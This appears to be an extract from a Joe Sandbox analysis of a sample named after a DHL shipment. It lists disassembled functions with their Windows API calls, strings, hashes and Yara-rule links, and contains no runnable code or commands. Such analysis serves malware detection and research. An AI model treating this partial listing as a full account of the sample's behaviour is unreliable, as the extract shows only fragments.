Opcode Fuzzy Hash: 37d994b6a43c70ddc45ab12fb346f370d9a75a9642cbe7c7906a3c4db918d37a
Instruction Fuzzy Hash: FC21F931700204BBDB10ABA58E49FFE3BB8EB59710F055029FA05DB280D7748D45C7A1

Function 00AD49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00AD4A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00AD4A5C
SetErrorMode.KERNEL32(00000000,?,?,00AFCC08), ref: 00AD4AD0

Strings

%lu, xrefs: 00AD4A6F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 1b1562b0a25916f4445c971ca27144288846ab641b1f8a8cc2980ef8e0bb1c88
Instruction ID: 79a0570dbd929d65f5bee7df46322fa5cf717b54610566775baf3312828b17ec
Opcode Fuzzy Hash: 1b1562b0a25916f4445c971ca27144288846ab641b1f8a8cc2980ef8e0bb1c88
Instruction Fuzzy Hash: 4F314175A00109AFDB10DF94C985EAA77F8EF48318F1480A9F509DB362D771EE46CB61

Function 00AC1B2C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00AC1B4F
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00AC1B61
SendMessageW.USER32(?,0000000D,?,00000000), ref: 00AC1B99

Strings

@U=u, xrefs: 00AC1B99

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: efdc22bc08a15d90c58a2f7da8ab307367438106c558d10b17d8f7b76bc9f1c3
Instruction ID: 59e02110dbd970073c4cbac2636fbdfb3203061b262e71e6fe4d89b1105143bd
Opcode Fuzzy Hash: efdc22bc08a15d90c58a2f7da8ab307367438106c558d10b17d8f7b76bc9f1c3
Instruction Fuzzy Hash: 3621AE32700118BFDB11DBA9C941EAEB7FAAF45350F1104AAE105E7291EA71AE418B94

Function 00AE0CD5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000402,00000000,00000000), ref: 00AE0D24
SendMessageW.USER32(0000000C,00000000,?), ref: 00AE0D65
SendMessageW.USER32(0000000C,00000000,?), ref: 00AE0D8D

Strings

@U=u, xrefs: 00AE0D24, 00AE0D65, 00AE0D8D

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 55d974b0e2f7c183dd0666890889e5b6cf5e771d9d48107ab4e69d96393b7440
Instruction ID: 7952c70a133041bc121f1df692abc55cc84c7a3621ec56c13fb99186ca93db91
Opcode Fuzzy Hash: 55d974b0e2f7c183dd0666890889e5b6cf5e771d9d48107ab4e69d96393b7440
Instruction Fuzzy Hash: 84210875210500AFD710EB69DE85D6AB7FAFB09710B008955F90ADBA71DB70FC91CB90

Function 00AF41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00AF424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00AF4264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00AF4271

Strings

msctls_trackbar32, xrefs: 00AF4226

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: ff71ebbc7cc326e7c174e7b9568848e57a29c0fe9a99eee5a84438df1edd67b6
Instruction ID: f84eacf8ba0cb6620c360b22775b359217bca80ae3374b205c01cd8014b1bdc1
Opcode Fuzzy Hash: ff71ebbc7cc326e7c174e7b9568848e57a29c0fe9a99eee5a84438df1edd67b6
Instruction Fuzzy Hash: 4511E331240248BEEF205FA9CC06FFB3BACEF89B64F114624FA55E20A0D671D811DB24

Function 00AC2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A66B57: _wcslen.LIBCMT ref: 00A66B6A

Part of subcall function 00AC2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00AC2DC5
Part of subcall function 00AC2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AC2DD6
Part of subcall function 00AC2DA7: GetCurrentThreadId.KERNEL32 ref: 00AC2DDD
Part of subcall function 00AC2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00AC2DE4

GetFocus.USER32 ref: 00AC2F78

Part of subcall function 00AC2DEE: GetParent.USER32(00000000), ref: 00AC2DF9

GetClassNameW.USER32(?,?,00000100), ref: 00AC2FC3
EnumChildWindows.USER32(?,00AC303B), ref: 00AC2FEB

Strings

%s%d, xrefs: 00AC2FFF

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 52022d02fddca90e734acd5f82f3b93d96bb604819db4013a070dbcab0a373fc
Instruction ID: f2b0992d61b90a5805f672d692f627fd4302a12342c141bbbce97e607533e5c4
Opcode Fuzzy Hash: 52022d02fddca90e734acd5f82f3b93d96bb604819db4013a070dbcab0a373fc
Instruction Fuzzy Hash: 9011D572200209ABCF51BFA48D85FFD376AAF94314F048079F909DB192DE705A09CB60

Function 00AF3429 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00AF34AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00AF34BA

Strings

edit, xrefs: 00AF348F
@U=u, xrefs: 00AF34BA

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: @U=u$edit
API String ID: 2978978980-590756393
Opcode ID: c41d3cb9ca77a3a0d93d760ae3b67c14d1512ff42ddc48608cbad4f062a74e28
Instruction ID: b5756909f20ae6d17fe861569460e4870b57008f91cc469e7cdda298923a4769
Opcode Fuzzy Hash: c41d3cb9ca77a3a0d93d760ae3b67c14d1512ff42ddc48608cbad4f062a74e28
Instruction Fuzzy Hash: 6C118C7210020CABEF228FE5DC84ABB376AEB05776F508724FA61931E0C775DC919B64

Function 00AC1CDE Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A69CB3: _wcslen.LIBCMT ref: 00A69CBD

Part of subcall function 00AC3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00AC3CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AC1D4C

Strings

@U=u, xrefs: 00AC1D4C
ComboBox, xrefs: 00AC1CEB
ListBox, xrefs: 00AC1D16

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: @U=u$ComboBox$ListBox
API String ID: 624084870-2258501812
Opcode ID: 86170416abc1c16f97eac462ce05eb81fa91fe6244f1903aadcf1c67c4ce6da2
Instruction ID: 75d3097c50b73f227f7c3b6583e464e82f03bbeb21ba0673485c0dace3f37ccd
Opcode Fuzzy Hash: 86170416abc1c16f97eac462ce05eb81fa91fe6244f1903aadcf1c67c4ce6da2
Instruction Fuzzy Hash: 6E01B575701218ABCF15EBA4CE55EFF73B8EB57350B14091DB823672D2EA3099098660

Function 00AC1BD8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A69CB3: _wcslen.LIBCMT ref: 00A69CBD

Part of subcall function 00AC3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00AC3CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00AC1C46

Strings

@U=u, xrefs: 00AC1C46
ComboBox, xrefs: 00AC1BE5
ListBox, xrefs: 00AC1C10

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: @U=u$ComboBox$ListBox
API String ID: 624084870-2258501812
Opcode ID: d50257f99028eac993151977a9b444c72b72fcaf9530e537bc021a45919e582c
Instruction ID: c3a7914464b2f700cae2ac352f0542c740f2f24ea9931c7201235a8600fc4397
Opcode Fuzzy Hash: d50257f99028eac993151977a9b444c72b72fcaf9530e537bc021a45919e582c
Instruction Fuzzy Hash: C40171757851086ACF14EB90CB55EFF77A89B12340B140019B40667282EA249A18A6B1

Function 00AF5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00AF58C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00AF58EE
DrawMenuBar.USER32(?), ref: 00AF58FD

Strings

0, xrefs: 00AF588F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: eaf7d590ba0639ebe3add0dcacbd54bdd1a020595908ce12d7e5e77a97838dff
Instruction ID: d309b67f87488e3a5a6a6c23838d9dcfdda444d0a391b22f26d5ebc0ab224fa9
Opcode Fuzzy Hash: eaf7d590ba0639ebe3add0dcacbd54bdd1a020595908ce12d7e5e77a97838dff
Instruction Fuzzy Hash: 7201393190021CEEDB219FA1DC44BAABBB5BF45361F10C099FA49D6151DB708A85EF21

Function 00AF7803 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,00B318B0,00AFA364,000000FC,?,00000000,00000000,?,?,?,00AB76CF,?,?,?,?,?), ref: 00AF7805
GetFocus.USER32 ref: 00AF780D

Part of subcall function 00A79BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A79BB2

Part of subcall function 00A79944: GetWindowLongW.USER32(?,000000EB), ref: 00A79952

SendMessageW.USER32(012E0790,000000B0,000001BC,000001C0), ref: 00AF787A

Strings

@U=u, xrefs: 00AF787A

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: @U=u
API String ID: 3601265619-2594219639
Opcode ID: cafe872b0deedc1e4d42c3f2e76f1f15b56063ade421eb3960ff2fbb35e09652
Instruction ID: f70be242930dbc461e19fb560f8769b5c7923308ae8b12b2d02e2e64fccb9623
Opcode Fuzzy Hash: cafe872b0deedc1e4d42c3f2e76f1f15b56063ade421eb3960ff2fbb35e09652
Instruction Fuzzy Hash: 23017C316051148FD325DBA8DD58ABA33EAAF8A360F284669E115872E0CB316C43CB80

Function 00ABD3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00ABD3BF
FreeLibrary.KERNEL32 ref: 00ABD3E5

Strings

X64, xrefs: 00ABD2A8
GetSystemWow64DirectoryW, xrefs: 00ABD3B9

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 20db8fedbb15533f23ce5ea60c0aceec820662d5c6e8f331dfd6a44e5464d4dd
Instruction ID: 720004e7628c465cbdad3f18a79614cb2d3523c08a8eef80fc08a22837a67486
Opcode Fuzzy Hash: 20db8fedbb15533f23ce5ea60c0aceec820662d5c6e8f331dfd6a44e5464d4dd
Instruction Fuzzy Hash: E3F0AB31802A659BC33143518C289FD737CAF00B01F68C269F806E9007FB24CD4486CA

Function 00AC007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 146ed5a5111f230dbb43352b840652cfd8acf042af9c92ec98096f2780d09bc8
Instruction ID: 40f7d9d070f2a55e8bec1bdc25a71e981f549aafdd35c47b5e144092c9e8ce67
Opcode Fuzzy Hash: 146ed5a5111f230dbb43352b840652cfd8acf042af9c92ec98096f2780d09bc8
Instruction Fuzzy Hash: 6EC13875A0021AEFDB14CFA8C894FAAB7B5FF48304F168598E505EB251D731ED41DB90

Function 00AE342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00AE3459
CoUninitialize.OLE32 ref: 00AE3463
VariantInit.OLEAUT32(?), ref: 00AE346E
VariantClear.OLEAUT32(?), ref: 00AE371B

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: ff662f7399ad45fb6a131934607059f766b7b25dfbb2ce016e3a0b1d0e8048b7
Instruction ID: 763a26d55581e0b1d52a87e6d43143badd60aadcc4ca648eb84280034f17eee8
Opcode Fuzzy Hash: ff662f7399ad45fb6a131934607059f766b7b25dfbb2ce016e3a0b1d0e8048b7
Instruction Fuzzy Hash: 6FA119766143409FCB10DF69C585A2AB7F5FF88724F048859F98A9B362DB30EE01CB91

Function 00AC0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00AFFC08,?), ref: 00AC05F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00AFFC08,?), ref: 00AC0608
CLSIDFromProgID.OLE32(?,?,00000000,00AFCC40,000000FF,?,00000000,00000800,00000000,?,00AFFC08,?), ref: 00AC062D
_memcmp.LIBVCRUNTIME ref: 00AC064E

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 63aafc42855a9a729c1e37f7363244f491a7d9b7e41e1586314eed16b01c4b27
Instruction ID: b5141214e2462bb5e3d900dfa1e0e5d5f2d03782ed8a8f3b31821d18e94a3e46
Opcode Fuzzy Hash: 63aafc42855a9a729c1e37f7363244f491a7d9b7e41e1586314eed16b01c4b27
Instruction Fuzzy Hash: 7A81E975A00109EFCB04DFE8C984EEEB7B9FF89315F214558E516AB250DB71AE06CB60

Function 00AA1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00AA14C0

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 48b3b853e178c5c722c085614af667c064abcb9438fcc9bb54bee2f4ecb23bf6
Instruction ID: 0df82848c7c1c73d7a8d895477b36f00bd3b55cd8d278d40636c8c06c83cf887
Opcode Fuzzy Hash: 48b3b853e178c5c722c085614af667c064abcb9438fcc9bb54bee2f4ecb23bf6
Instruction Fuzzy Hash: D1410675A00615BBDF21BBBD8D46ABE3AE4EF4B370F144225F419D71D2E734884153A1

Function 00AE1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00AE1AFD
WSAGetLastError.WSOCK32 ref: 00AE1B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00AE1B8A
WSAGetLastError.WSOCK32 ref: 00AE1B94

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: f09ff3eb5dd179e4797ca947619dbc358d6a968b4ed015878581f680fef48866
Instruction ID: eadc3f68808e7ff55bde3f8212b1a1063d5ca1d93157a72426cfe0488a6e5493
Opcode Fuzzy Hash: f09ff3eb5dd179e4797ca947619dbc358d6a968b4ed015878581f680fef48866
Instruction Fuzzy Hash: E541DF74600210AFE720AF25C986F2A77E5EB44718F54C488F91A9F3D2D772ED42CB90

Function 00A9B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25670c5feb22d490ea19ad7a38e5f1e4e6a137a090916baa36ff72264e2437f5
Instruction ID: ee5a1ab604eb3da181512f854fdbc08d1b26e072cbf8ae29873a95d795a44554
Opcode Fuzzy Hash: 25670c5feb22d490ea19ad7a38e5f1e4e6a137a090916baa36ff72264e2437f5
Instruction Fuzzy Hash: 50411975B10304BFDB24AF78DE41BAABBE9EBC4710F10852AF152DB2D1D771990187A0

Function 00AD56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00AD5783
GetLastError.KERNEL32(?,00000000), ref: 00AD57A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00AD57CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00AD57FA

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
